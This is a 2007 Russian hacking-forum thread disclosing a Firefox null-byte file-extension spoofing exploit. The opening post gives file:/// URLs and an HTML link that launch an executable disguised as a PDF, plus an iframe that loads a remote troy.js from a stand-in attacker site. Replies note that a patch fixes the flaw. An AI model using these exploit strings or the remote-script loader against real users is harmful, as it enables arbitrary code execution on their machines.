ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Mozilla Firefox URLBar: выполнение произвольного кода.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Mozilla Firefox URLBar: выполнение произвольного кода.
  #1  
Старый 24.07.2007, 10:30
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию Mozilla Firefox URLBar: выполнение произвольного кода.
Mozilla Firefox URLBar: выполнение произвольного кода.
автор: 0х00000000
www.0x000000.com/?i=333

Цель: Mozilla Firefox практически всех версий. <=2.0.0.4

Опасность: 4/10

Exploit:
В строке URL пишем:
Код:
file:///C:/winnt/system32/calc.exe%00.pdf
или в теле html-документа используем ссылку вида:
Код:
<A HREF=file:///C:/winnt/system32/calc.exe%00.pdf>download</A>
Общий вид эксплоита: [uri]/[filelocation]/[file][.ext1]%00[.ext2] - где между расширениями файла ext1 и ext2 вставлен терминирующий символ "%00" (нулевой байт - признак конца строки).

Подробности:
При открытии вредоносной ссылки Огненный Лис запутывается: он распознаёт этот файл как приложение (о чём честно пишет вверху) а ниже предлагает открыть этот файл как pdf-документ.

Если уязвимое приложение самостоятельно сопоставляет тип файла с обрабатывающем приложением, то при попытке открытия файла calc.exe%00.pdf запустится, например Acrobat Reader и попробует открыть файл calc.exe, что у него естественно не получиться и вместо захвата управления мы увидим сообщение Акробата о не верном формате файла. А вот если файл открывается API-функциями ShellExecute/ShellExecuteEx, то сопаставление типа и расширения ложиться на плечи операционной системы и она послушно запускает calc.exe.
Тут открываются возможности по выполнению произвольного javascript-сценария: например так:
Код:
file:///path/troy.txt%00.html
а файл troy.txt%00.html может содержать например такой html-код:
Код:
<html>
<iframe name="bla" src="http://www.you_site.com/hacks/?troy.js" width="100%" height="900"></iframe>
</html>
Защита: Внимательно смотрите на раширения файлов перед открытием.

ЗЫ: Другие уязвимости FF:
Цитата:
Найденные уязвимости позволяют удаленному злоумышленнику обойти ограничения безопасности, выполнить произвольный код, осуществить XSS атаку, произвести DoS атаку и атаку спуфинга.

1) Уязвимость возникает из-за множественных ошибок в движке браузера. Эксплуатирование уязвимости приведет к порче участков памяти и выполнению произвольного кода.
2) Уязвимость возникает из-за множественных ошибок в движке Javascript. Эксплуатирование уязвимости приведет к порче участков памяти и выполнению произвольного кода.
3) Уязвимость возникает из-за ошибки в методах "addEventListener" и "setTimeout". Эксплуатирование уязвимости приведет к обходу политик безопасности браузера и выполнению сценария в контексте другого сайта.
4) Уязвимость возникает из-за ошибки междоменной (cross-domain) обработки. Эксплуатирование уязвимости приведет к вставке произвольного сценария в sub-frame другого Web сайта.
5) Уязвимость возникает из-за ошибки в обработке элементов внешних документов. Атакующий может вызвать обработчик событий и выполнить произвольный код с привилегиями chrome.
6) Уязвимость возникает из-за ошибки в обработке "XPCNativeWrapper" Атакующий может выполнить произвольный код
за подробностями на bugtrack.ru
Последний раз редактировалось -=lebed=-; 24.07.2007 в 11:11..
 
Ответить с цитированием

  #2  
Старый 24.07.2007, 10:52
Аватар для kot777
kot777
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277

Репутация: 1635


Отправить сообщение для kot777 с помощью ICQ
По умолчанию
Уязвима только 2.0.0.4, в 2.0.0.5 уже фикс.
__________________
ICQ 328498627

Хочешь Элитный OpenVPN за 10 у.е ?
 
Ответить с цитированием

  #3  
Старый 24.07.2007, 10:53
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию
Мде...неплохо
Для каких версий фф?
 
Ответить с цитированием

  #4  
Старый 24.07.2007, 20:30
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию
Цитата:
Сообщение от Isis  
Мде...неплохо
Для каких версий фф?
мдя, ты только первых 5 слов прочитал в названии темы чтоли?
Цитата:
Уязвима только 2.0.0.4, в 2.0.0.5 уже фикс.
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #5  
Старый 29.07.2007, 09:54
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию
c411k,
Цитата:
Последний раз редактировалось -=lebed=-, 24.07.2007 в 11:11.
Ниче так , да?
 
Ответить с цитированием

  #6  
Старый 29.07.2007, 11:48
Аватар для Zedobat
Zedobat
Участник форума
Регистрация: 24.07.2007
Сообщений: 175
Провел на форуме:
1092179

Репутация: 102
По умолчанию
Ну а что собственно удивляться. Вышла новая версия, и выкладывают дыры в старой. Так было и будет всегда, и не только для ФФ.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Mozilla приступила к созданию Firefox 3.0 Dracula4ever Мировые новости 0 31.10.2006 10:29
Mozilla сегодня выпускает Firefox 2.0 Zek Мировые новости 4 25.10.2006 05:21
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
Удаленное выполнение произвольного PHP кода в Zeroboard Red Форумы 7 14.01.2005 03:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ